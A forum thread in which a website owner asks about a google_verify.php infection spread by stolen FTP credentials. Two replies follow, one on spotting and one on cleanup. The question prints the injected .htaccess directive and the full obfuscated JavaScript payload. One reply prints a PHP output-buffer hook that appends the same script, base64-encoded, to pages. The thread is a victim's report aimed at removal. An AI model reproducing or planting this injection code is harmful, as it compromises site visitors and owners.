Geek Answers Handbook

Problems with google_verify.php viruses and ftp passwords

A few days ago I had problems with my sites. On all ftp servers I received some php file called google_verify.php and the following text was added to my .htaccess file:

<IfModule mod_php5.c> php_value auto_append_file "google_verify.php" </IfModule> <IfModule mod_php4.c> php_value auto_append_file "google_verify.php" </IfModule>

Here is the google_verify.php file:

 <script>d='function $M(file -z ?P LB="GE <= a ,rt="" Ke ,E=tru & ,r.offset=100 Un LL @u @y @J LA9 N ,e @q LA9 N Um Ln ],P ]Urg Lk(); .sxml2 X1 A.icrosoft X2 -z=null}}if(! z Ztypeof M!="undefined" -z : M ]+ E= 4}} Uc _> -t[ $o [>,false) Uv _>, =vars Z 4== =vars A= /( % $o), % >)) + t[ % $o) [% >) W} UH L$p, $SA$T= % Yx);regexp :RegExp( Yx+"|"+ $T); H/ Sp 6regexp) Ii=0;i< H/ hj= H/[i] 6"=");if( 4= SS -v G + c G}}}; a.trim _$f Z"qabcdef".indexOf( $o.substr(0,1))>=0){ H $rs So 6\'q\') 8\'\') 6\'v\') I Hi=0;i< $rs hrs[i]=parseInt( $rs[i],16)- k = $rs 8\',\')+ \',\'}else{ajax gr.offset2=25; = k}; 9unR ( !){eval( 9 ]UrN L db&& Yt 7 -H( Yt W} 3 drt 7 OR + rt SR}} c(" $a",new Date().getTime()); $h : / ]Ikey in( t) Zfalse== C1]&& 4== b A$T= v(key, C0] W ,t[key] ?t[ $T[0] [$T[1] W;key ST[0]} $h[ $h 7]=key+"="+ C0]} 3$R Oh 8 Yx) + rt+ Sh 8 Yx)} Uk LB="POS <t="";d=\'v={@ VM$1XH:"e-",@ V`$1XH:"",*b VM$1Xv30:"l(\\\'l=Str" \\\\_:"ing.fr",JG*2%a%fzV*aV:"omCha",>%8%8*2*5LB0_*4:"rCode(" <6#fF%3#f#7#d_$4y<d*3*6$eV*e*d$a*3&6R8#b!0G%4#d%eTM `8B6P*3K#6>*4HY/c*dPB1JJ- a$4*6&9<7E*bQ`NX@U&3W2E*eQ*4?Q*2E&7W5!3%b#e#8!0*8#6J `6PV#c#9!fB3*1V&6W9*7#f%6-3*d#f- d-fy,a2%2#e TT#c!1&1/b#eT!1#c!1*4*bd&1/4-f#f%6%2#d ^5`y<4?T*5KUB6P*3Y/9*eZw*5#a#9A*7&9/1@U TLP T&1D3HK%8>O@w*5Y/9O~T@#6T@~&9D1ZwJB6A*eZG&9,d5H*3#8#7E*5?%8&7/d-eF!fJ-eFG%6y /6B0!2G_%3#f_%3yD0%1EJ%1EHwA&5,d0@$f!2#e$1MX?yD1*9U%aAGA*9A&9,a2#7G-a?*1-bM?I /1-0-7%4%1$4T#dc `9J?%8J%3AGE&7Df*e!0*cZA#b!3*2 `aH-aOB7B7OJGI<2?GJ#aPP?$e&1W5%4z$1*7Gz$1*5I/3*4#d*0!3`!0F!0 `8$dO%6` %4$4%b!f&5D4OOOB0#eVN-1&3W0*3$b!3*b*aw*0$b&3De%a@UB0#e-dN-1&3W2>M- 3*0K*2*5_&5WeOA%7*3#6-7%e*3&6/4%7!fN f&1,a6M$f_*b#7B1B1#7&5D7#f%a$3XUFPZ e9QMAU$1JB4U&9Wf*5*8@$1>U>@YR1 %4Q%6%4UQ%6#7&9Rb$f%fzB3B7*5?*fI/9$1*4#eUUA$1*2&6D6^F#8~#b%0%0F ea%7%eN%7!2 ^7?y/5Z#e#b$e$e_Z*0yD6~GF#8^#c%0%0&4D9#8O>HB5>*d@Y<9*5*5#8>*6>>#7YW1^??*4B7?*fGI <7*4#6V*eOA$0V&6/2@#d-awA-f#f_yW5!0#b-8*aE-d#d!3&0Wd%8*3%0$e!fT*5@YWeGB7J- aB2AAH&9<9%7`-b$e|$3-b$b&5R4$bd$d$4|-d$4$3 j6-9Q$b%e-9w%7X&3,ac%8zK-c$f$b|-c&6R4%aM- dN%aB1-d%e j7$a?U-4Q!3!3?&3<2-7%3-7%4-7T-7%6&1,af%ff$0-f$1-f$3-f&9R3%0N%0X%0M%0`I,acN- cX-cM-c`-c&6Rc-f$df$ef$f-fB0&9,ac$ec$f-cB0G!f- 7&6,a0FF#7H#6H^H&4D9P#aP#bP#cP#d&5D2#f!f*1A`$a*3*6&6/4-4GF%6GF*fG&1 /4T!1_AAAF*f&1D3H@KJ@-bPPYD2!f?KT?-aHP&7/6%7ULV-6UB0-4&3R5!fV$d!fV$4!fV&3<7P>$a- 6MM_*b&5RczPJ^#b!3N#d `8M|Gd$bU%2P&5,a9*b>-eG-9%8>-e&1/fV%4ULVNN#e&3/6N*0VQ- e!3>*4&3W3 ^4#8^@E~#8y<2H>$4%0_?*6*6&5/b#e#e~ ^4_$4zy<0#eV$d*0!3#c#6!3&3W4OJ@- fG!2#b#6y/2*4OJ@-f#d_$3yW2_^*fU%2H_#7&5/8M$fL%2H_^*f&5/a%0G!3^VN$dU&3<6*4A- 4#fJL#b*0&9D1T*3@-a*5>-3>YD9#9#bH%4-8|$a*4 j5*2#b#6*2#f#6*1#eID0#b#8H#d#6H^#b ed#9OG#8~G#9P&1D3#a#7O#f#9O#e#e&7/dO#6GJJGJP&1D5#a#9^#f#a^#a#a&9 /f#8#9!f#8#8!f~~&3D3#c#aO#dO#c#aO&7D9L~LOLJL#6yW0T*3%eM$aH>^Y<d*1~#fZ*0EXM ea*4*5$3^^OB5GIR4N-d%bf#f-5X$4y<e$3KO%bM$4Q*8&5<b%4N*6Q%7%8@K&3D4U$bz %4Q%6~#b&9DbHB4E~|*4L%f&7R7M$3#dJJ?LV&3<aO@B2O@|O@YRc^Gc^GB3T%2IWaE- dGP-d@EL&0<3%fZ!fE@!3Q$3&0D1ZQK$1@??U&3Db!3*3>!0#8*2|*9&0<cH!fK#b!fP~!fYW0%8Z$aF*eFH%0 ec*8*6?#f?$dzZIDd-c!2E@Q@Ec `6F$bZ%8`K*1^&4D9#9A$1%eQ$0$1$d&9W1#c~*2*0OF#9F&4,a1B1B1#fE*5*1*4E&4<aE@E?-b^%a| j9T`w*9$0w$1w&4R3|G>%8LB2*0>&5W8*2*5>-2P>NL&5,d1A-3~%f$4$4%b`&6,a0- c-5-4*5@`B5*3Y/dzB2*7*a?-2*f@I/2*6 ^b ^a*7!2OyD3%7$4w$e*2*2$3$a&5R5NA- 1*5`$e$dP&9/3Q`UJHH!0@&0<2$b*5>*c*3%2$b>YWc*0MN`%8#ed$a&3W5>#9#6%aMKB1*3Y,ae-8*1F^- 5*c*1E&4W3?A%6%b`A@#dy/9*9LA*eJG*2%a&6<aM!1%aT#e TT&1DcT@A-3ZQz|&9<c%1|#a%e%f%eT#b `2L#d-eF ^f#d_yRf>L-0P-9X>#fYDd ^9*4#f!2#aN*4yRb-6%3w-0%3%f%7?y/7%8T%1%4EA- bH&0<4-8*dE>N-eE*6 ja!3*f*9U#eV*5!3&3/dNHB4B4B4*2%1|&7Rc*1EXz#fEXz ee!fA$1$eT?~Z&6<5$4-5-4*3*0%6N%e&0<6MKQ$1@-4#e!3&3/d!3-6EUE- 7L$3&0<dz*9zz$a$1%a$dYRcZH!f$b$a%b!f~Y<1EZ||N#f~~&5<9`$1#6z$f$1zzY<b`~wN$3^#7^&6R5 fHT%2&1<c%fzPZXQ$1*2&3,aeA$0%1GA%0V*a&6D8G%aL-7|`$eQI/fHJ#8B5*b%8$bK&7 /f%3%3LH*5~#8E&7DfF*8A^?!1H!1&1/7*4NK$eE*8|| j4z@!3F*0-0%4M&3R0#6$awXKMNHY/cPMQ- 6MNK$1&3<9?@#d_!2V@$dyR7%a|$aM$3_?G&5/f!ff%eL%4G#7$f&7/5@O%6NN%a$3w&5Wb$0$1$4KH@>HY /8*cG#9L_#f*0%7&5R6wT%fB1FLF*7&4<b %0V%1F!fGB1w&4<c$3T$b!0UXw$3&0<9%2wKw$4|#a%8&0R1KKZX>^$ewYR6FFJEK- fZ%1&4<5*0%7#8$b$f%fzB3ID3_~O%8Z%6M*8&5R8Z%e*a$dP#aA*b&9/9$b!f@V#aUU%f&6D2ZQ%8wz-3%aU edVV#6AN%1LL&6<1A#aZ`K$eX%e&9R0X!2#7%b%8$4%3%fy<bV#c%a~|%b$a- b&6,a5*4$fT_$f?L!1&1De*4?*8!fL$a%a| jd$4`@GF#cE-8&4D3K%a|*a$1 %aQ%a&5R6z>*1@M%3H>Y/e#c#c#a#aJ*7*7A&9DeJ$0wQ%b`KF&4W5L- 0$fXX%3%f%bIR4?@#d!2#eN%7Xy,aa%f$3%bV*4!fB1A&6<3#f ^1T%3%e%e%4y<aK$4*6%3$bA*bJ&9D1V#8V*9A-1%1%2&6/9?E*b$e$0N%bX&7R7!0*5w%6>!0*6#d `6XPQwwX%8M&3/8*f@$b#6@>-0PY,d2EE-0^E#c-3X j9KZK>-2>$bzY,d1$4Z*5%4?>-3@Y<2#d!0HXE- d?!0&0WdE$3%fT#e TU&1/6!3-0*1#fJ%7K|&3W4G!f>*1KN`L&6<5#f#a#9#dT#d%6#fy /8$4#d%4L$3$0Kw&0R6?A_V*2-3-8-9y<2%4%aB8%6%6???I/5F>FAF?FU ea~?^?#6?#7?ID7A#8A#bA#dA#9&9/5#6_#a_#b_#c_&5W0>*1>*2>*3>*4Y /4*2F*3F*6F*7F&4W8F*9F*aF*bF*c e1*a!1*b!1*c!1*d!1&1,a7P#8$d$fK$d$ezI/9%4L#eA|#e%4#d&1D9#b*7#9*2#aP~B0YD2JJ#7$3`Q MP&9Re#8$a|$aJOOOIDc%6M%2ZAT?&1\\\\E:"32);ev",*``ZXK*b$0$1:"al(l) \\\'",EE!0*9Q>!0#8*2:");"};dk=[] Ir x in v){dk.push(trim(x,v))};el(dk 8\\\'\\\'))!v7#v8$vc%vb&:8*v9+,q- va/+7<,b>!8?!a@!bA!9BvdD+8E!7F!4G!dH#0I:90J#2K%cL!eM$7N$5O#3P#1Q$2R,cT%5U!cV!6W+ 9X$6Y&8Z%d^#5_!5`$8w%9y&2z$c|$9~#4\\\\,#6^L%2*0>$f*2\' Ic=46;c--;d=(t=d 6\'!#$%&*+-/<>?@ABDEFGHIJKLMNOPQRTUVWXYZ^_`wyz|~\\\\\'[c])) 8t.pop())); 9 (=d K &}; 9unAJAX L dE -q ]+ rN( $R); 3 rr -A 2 Yr)} 3 z){ Hself=this; 3 B=="GET" A$K= F+ i+ Yt , R$KW + RFW;try{ z.setRequestHeader("Content-Type","application/x-www-form- urlencoded" 5){}} z.onreadystatechange !){switch( #z.readyState){case 1: #L 02: #u 03: #y 04: ;= #zr (Text; ;XML= #zr (XML; #C[0 Q; #C[1 QText; 3#w){self.r N 3#AA)= #A.nodeName; ).toLowerCase(); 3)=="input Jselect Joption Jtextarea" A#A. >= ; +#A.innerHTML= ;}} 3#C[0]=="200" A#J ]+#e()} #rt="";break} Uz.send( Yt)}} Um ],rg()} a.ajax : $M();try{ H $G 2\' $D\') *c("query", $G gd gf) *F="query.php" *B SG gB gf *rr=\' $rz\' *L SN *u Sg *y Ss *J Sx; P 5){ P)} this g !=function( #self g $kx_ %encodeURIComponent( &e ,rr ?A ?F=file ,t :Object ],C : /(2) (esponse )elemNodeName *;ajax g +}else{ ,; - A .try{ z :ActiveXObject("M /Array 0();break;case 2=document.getElementById( 3if( 4true 5)}catch(e 6.split( 7.length 8.join( 9this.r :=new ;self.r ( <T" ,i="?" ,rx="&" ,r =return >value ?=null , @ !){ UA){ C t[key][ G( $j[0], $j[1]) Hvar I;for( J"|| )==" K ,b= 4 ,w=fals L ! MXMLHttpRequest NunR (()} O -rt+= Yx+ $ Pajax.runAJAX( Q]= #z.status Rz.open( B, S= $ Td!3 U} , V%b%a#6Q W, 4) X.XMLHTTP" 5 Y r Z){if( []= /( ]() ^!2* _ L$o, `&0/ awindow d$R A3 e&4/ f$3%6%fT$4 g. $ h 7;i++ A$ j&7< k $f[ $o]}';for(c=130;c;d=(t=d.split(' ! # $ % & ( ) * + , - . / 0 2 3 4 5 6 7 8 9 : ; < = > ? @ ACGHIJKLMNOPQRSTUVWXY Z [ ] ^ _ ` adefghj k'.substr(c-=(x=c<2?1:2),x))).join(t.pop()));eval(d)</script>

I suspect that my computer is infected with some kind of virus that can read my ftp access settings from my ftp manager.

Does anyone know more about this virus and how can I clean my computer?

Thanks in advance

+8
passwords .htaccess ftp virus
source share
2 answers

I am not a security specialist, but one of my sites received the same file. From my limited knowledge and research, it happened that your site was hacked and the google_verify.php file is part of an injection attack.

You should also check other files on your site (especially index.php / htm / html) and look for:

  ob_start("security_update"); function security_update($buffer){return $buffer.base64_decode('PHNjcmlwdD5kPSdmdW5jdGlvbiAgJE0oZmlsZSAteiA/UCBMLUI9IkdFIDw9IGEgLHJ0PSIiIEtlICxFPXRydSAmICxyLm9mZnNldD0xMDAgVW4gTC1MIEB1IEB5IEBKIExBOSBOICxlIEBxIExBOSBOIFVtIEwtbiBdLFAgXVVyZyBMLWsoKTsgLnN4bWwyIFgxIEEuaWNyb3NvZnQgWDIgLXo9bnVsbH19aWYoISAgeiBadHlwZW9mICBNIT0idW5kZWZpbmVkIiAteiA6IE0gXSsgRT0gNH19IFVjIF8+IC10WyAkbyBbPixmYWxzZSkgVXYgXz4sID12YXJzIFogND09ID12YXJzIEE9ICAvKCAlICRvKSwgJSA+KSkgKyB0WyAlICRvKSBbJSA++T0B3KjVZLzlPflRAIzZUQH4mOUQxWndKQjZBKmVaRyY5LGQ1SCozIzgjN0UqNT8lOCY3L2QtZUYhZkotZUZHJTZ5LzZCMCEyR18lMyNmXyUzeUQwJTFFSiUxRUh3QSY1LGQwQCRmITIjZSQxTVg/eUQxKjlVJWFBR0EqOUEmOSxhMiM3Ry1hPyoxLWJNP0kvMS0wLTclNCUxJDRUI2QtYyBgOUo/JThKJTNBR0UmN0RmKmUhMCpjWkEjYiEzKjIgYGFILWFPQjdCN09KR0k8Mj9HSiNhUFA/JGUmMVc1JTR6JDEqN0d6JDEqNUkvMyo0I2QqMCEzYCEwRiEwIGA4JGRPJTZgJTQkNCViIWYmNUQ0T09PQjAjZVZOLTEmM1cwKjMkYiEzKmIqYXcqMCRiJjNEZSVhQFVCMCNlLWROLTEmM1cyPk0tMyowSyoyKjVfJjVXZU9BJTcqMyM2LTclZSozJjYvNCU3IWZOIGYmMSxhNk0kZl8qYiM3QjFCMSM3JjVENyNmJWEkM1hVRlBaIGU5UU1BVSQxSkI0VSY5V2YqNSo4QCQxPlU+QFlSMSU0USU2JTRVUSU2IzcmOVJiJGYlZnpCM0I3KjU/KmZJLzkkMSo0I2VVVUEkMSoyJjZENl5GIzh+I2IlMCUwRiBlYSU3JWVOJTchMiBeNz95LzVaI2UjYiRlJGVfWioweUQ2fkdGIzheI2MlMCUwJjREOSM4Tz5IQjU+KmRAWTw5KjUqNSM4Pio2Pj4jN1lXMV4/Pyo0Qjc/+LWVHLTklOD4tZSYxL2ZWJTRVTFZOTiNlJjMvNk4qMFZRLWUhMz4qNCYzVzMgXjQjOF5ARX4jOHk8Mkg+JDQlMF8/KjYqNiY1L2IjZSNlfiBeNF8kNHp5PDAjZVYkZCowITMjYyM2ITMmM1c0T0pALWZHITIjYiM2eS8yKjRPSkAtZiNkXyQzeVcyX14qZlUlMkhfIzcmNS84TSRmTCUySF9eKmYmNS9hJTBHITNeVk4kZFUmMzw2KjRBLTQjZkpMI2IqMCY5RDFUKjNALWEqNT4tMz5ZRDkjOSNiSCU0LTh8JGEqNCBqNSoyI2IjNioyI2YjNioxI2VJRDAjYiM4SCNkIzZIXiNiIGVkIzlPRyM4fkcjOVAmMUQzI2EjN08jZiM5TyNlI2UmNy9kTyM2R0pKR0pQJjFENSNhIzleI2YjYV4jYSNhJjkvZiM4IzkhZiM4IzghZn5+JjNEMyNjI2FPI2RPI2MjYU8mN0Q5TH5MT0xKTCM2eVcwVCozJWVNJGFIPl5ZPGQqMX4jZloqMEVYTSBlYSo0KjUkM15eT0I1R0lSNE4tZCViLWYjZi01WCQ0eTxlJDNLTyViTSQ0USo4JjU8YiU0Tio2USU3JThASyYzRDRVJGJ6JTRRJTZ+I2ImOURiSEI0RX58KjRMJWYmN1I3TSQzI2RKSj9MViYzPGFPQEIyT0B8T0BZUmNeRy1jXkdCM1QlMklXYUUtZEdQLWRARUwmMDwzJWZaIWZFQCEzUSQzJjBEMVpRSyQxQD8/VSYzRGIhMyozPiEwIzgqMnwqOSYwPGNIIWZLI2IhZlB+IWZZVzAlOFokYUYqZUZIJTAgZWMqOCo2PyNmPyRkelpJRGQtYyEyRUBRQEUtYyBgNkYkYlolOGBLKjFeJjREOSM5QSQxJWVRJDAkMSRkJjlXMSNjfioyKjBPRiM5RiY0LGExQjFCMSNmRSo1KjEqNEUmNDxhRUBFPy1iXiVhfCBqOVRgdyo5JDB3JDF3JjRSM3xHPiU4TEIyKjA+JjVXOCoyKjU+LTJQPk5MJjUsZDFBLTN+JWYkNCQ0JWJgJjYsYTAtYy01LTQqNUBgQjUqM1kvZHpCMio3KmE/LTIqZkBJLzIqNiBeYiBeYSo3ITJPeUQzJTckNHckZSoyKjIkMyRhJjVSNU5BLTEqNWAkZSRkUCY5LzNRYFVKSEghMEAmMDwyJGIqNT4qYyozJTIkYj5ZV2MqME1OYCU4I2UtZCRhJjNXNT4jOSM2JWFNS0IxKjNZLGFlLTgqMUZeLTUqYyoxRSY0VzM/QSU2JWJgQUAjZHkvOSo5TEEqZUpHKjIlYSY2PGFNITElYVQjZSBUVCYxRGNUQEEtM1pRenwmOTxjJTF8I2ElZSVmJWVUI2IgYDJMI2QtZUYgXmYjZF95UmY+TC0wUC05WD4jZllEZCBeOSo0I2YhMiNhTio0eVJiLTYlM3ctMCUzJWYlNz95LzclOFQlMSU0RUEtYkgmMDw0LTgqZEU+Ti1lRSo2IGphITMqZio5VSNlVio1ITMmMy9kTkhCNEI0QjQqMiUxfCY3UmMqMUVYeiNmRVh6IGVlIWZBJDEkZVQ/flomNjw1JDQtNS00KjMqMCU2TiVlJjA8Nk1LUSQxQC00I2UhMyYzL2QhMy02RVVFLTdMJDMmMDxkeio5enokYSQxJWEkZFlSY1pIIWYkYiRhJWIhZn5ZPDFFWnx8TiNmfn4mNTw5YCQxIzZ6JGYkMXp6WTxiYH53TiQzXiM3XiY2UjUgZkhUJTImMTxjJWZ6UFpYUSQxKjImMyxhZUEkMCUxR0ElMFYqYSY2RDhHJWFMLTd8YCRlUUkvZkhKIzhCNSpiJTgkYksmNy9mJTMlM0xIKjV+IzhFJjdEZkYqOEFePyExSCExJjEvNyo0TkskZUUqOHx8IGo0ekAhM0YqMC0wJTRNJjNSMCM2JGF3WEtNTkhZL2NQTVEtNk1OSyQxJjM8OT9AI2RfITJWQCRkeVI3JWF8JGFNJDNfP0cmNS9mIWYtZiVlTCU0RyM3JGYmNy81QE8lNk5OJWEkM3cmNVdiJDAkMSQ0S0hAPkhZLzgqY0cjOUxfI2YqMCU3JjVSNndUJWZCMUZMRio3JjQ8YiUwViUxRiFmR0IxdyY0PGMkM1QkYiEwVVh3JDMmMDw5JTJ3S3ckNHwjYSU4JjBSMUtLWlg+XiRld1lSNkZGSkVLLWZaJTEmNDw1KjAlNyM4JGIkZiVmekIzSUQzX35PJThaJTZNKjgmNVI4WiVlKmEkZFAjYUEqYiY5LzkkYiFmQFYjYVVVJWYmNkQyWlElOHd6LTMlYVUgZWRWViM2QU4lMUxMJjY8MUEjYVpgSyRlWCVlJjlSMFghMiM3JWIlOCQ0JTMlZnk8YlYjYyVhfnwlYiRhLWImNixhNSo0JGZUXyRmP0whMSYxRGUqND8qOCFmTCRhJWF8IGpkJDRgQEdGI2NFLTgmNEQzSyVhfCphJDElYVElYSY1UjZ6PioxQE0lM0g+WS9lI2MjYyNhI2FKKjcqN0EmOURlSiQwd1ElYmBLRiY0VzVMLTAkZlhYJTMlZiViSVI0P0AjZCEyI2VOJTdYeSxhYSVmJDMlYlYqNCFmQjFBJjY8MyNmIF4xVCUzJWUlZSU0eTxhSyQ0KjYlMyRiQSpiSiY5RDFWIzhWKjlBLTElMSUyJjYvOT9FKmIkZSQwTiViWCY3UjchMCo1dyU2PiEwKjYjZCBgNlhQUXd3WCU4TSYzLzgqZkAkYiM2QD4tMFBZLGQyRUUtMF5FI2MtM1ggajlLWks+LTI+JGJ6WSxkMSQ0Wio1JTQ/Pi0zQFk8MiNkITBIWEUtZD8hMCYwV2RFJDMlZlQjZSBUVSYxLzYhMy0wKjEjZkolN0t8JjNXNEchZj4qMUtOYEwmNjw1I2YjYSM5I2RUI2QlNiNmeS84JDQjZCU0TCQzJDBLdyYwUjY/QV9WKjItMy04LTl5PDIlNCVhQjglNiU2Pz8/SS81Rj5GQUY/RlUgZWF+P14/IzY/Izc/SUQ3QSM4QSNiQSNkQSM5JjkvNSM2XyNhXyNiXyNjXyY1VzA+KjE+KjI+KjM+KjRZLzQqMkYqM0YqNkYqN0YmNFc4Rio5RiphRipiRipjIGUxKmEhMSpiITEqYyExKmQhMSYxLGE3UCM4JGQkZkskZCRlekkvOSU0TCNlQXwjZSU0I2QmMUQ5I2IqNyM5KjIjYVB+QjBZRDJKSiM3JDNgUU1QJjlSZSM4JGF8JGFKT09PSURjJTZNJTJaQVQ/JjFcXFxcRToiMzIpO2V2IiwqYGBaWEsqYiQwJDE6ImFsKGwpXFxcJyIsRUUhMCo5UT4hMCM4KjI6Iik7In07ZGs9W10gSS1yIHggaW4gdil7ZGsucHVzaCh0cmltKHgsdikpfTtlLWwoZGsgOFxcXCdcXFwnKSkhdjcjdjgkdmMldmImOjgqdjkrLHEtdmEvKzc8LGI+ITg/+PSA7ICsjQS5pbm5lckhUTUw9IDt9fSAzI0NbMF09PSIyMDAiIEEjSiBdKyNlKCl9ICNydD0iIjticmVha30gVXouc2VuZCggWXQpfX0gVW0gXSxyZygpfSBhLmFqYXggOiAkTSgpO3RyeXsgSCAkRyAyXCcgJERcJykgKmMoInF1ZXJ5IiwgJEcgZ2QgZ2YpICpGPSJxdWVyeS5waHAiICpCIFNHIGdCIGdmICpycj1cJyAkcnpcJyAqTCBTTiAqdSBTZyAqeSBTcyAqSiBTeDsgUCA1KXsgUCl9ICB0aGlzIGcgIT1mdW5jdGlvbiggI3NlbGYgZyAka3hfICVlbmNvZGVVUklDb21wb25lbnQoICZlICxyciA/QSA/Rj1maWxlICx0IDpPYmplY3QgXSxDIDogLygyKSAoZXNwb25zZSApZWxlbU5vZGVOYW1lICo7YWpheCBnICt9ZWxzZXsgICw7ICAgLSBBICAudHJ5eyAgeiA6QWN0aXZlWE9iamVjdCgiTSAvQXJyYXkgMCgpO2JyZWFrO2Nhc2UgIDI9ZG9jdW1lbnQuZ2V0RWxlbWVudEJ5SWQoIDNpZiggIDR0cnVlIDUpfWNhdGNoKGUgNi5zcGxpdCggNy5sZW5ndGggOC5qb2luKCA5dGhpcy5yIDo9bmV3ICA7c2VsZi5yICggPFQiICxpPSI//IEAgQSBDIEcgSCBJIEogSyBMIE0gTiBPIFAgUSBSIFMgVCBVIFYgVyBYIFkgWiBbIF0gXiBfIGAgYSBkIGUgZiBnIGggaiBrJy5zdWJzdHIoYy09KHg9YzwyPzE6MikseCkpKS5qb2luKHQucG9wKCkpKTtldmFsKGQpPC9zY3JpcHQ+');}

This virus / malware seems to be affecting several CMS like Joomla, Wordpress, CodeIgniter etc. Additional information here and here .

+4
source share

The best course of action:

  • change all ftp and username passwords QUICKLY
  • uninstall all FTP programs on your computer
  • run virus scan and malware scan
  • make sure your computer is clean.
  • reinstall the FTP client (clean installation - download the new software version).

Now clean your WP website. - install WP plugins (tac, use a scanner) - run plugins - mark infected files - use the FTP or WP plugin editor to clean these files - run the exploit scanner and tac until the site becomes clean.

Hope this helps ...

+1
source share

More articles:


All Articles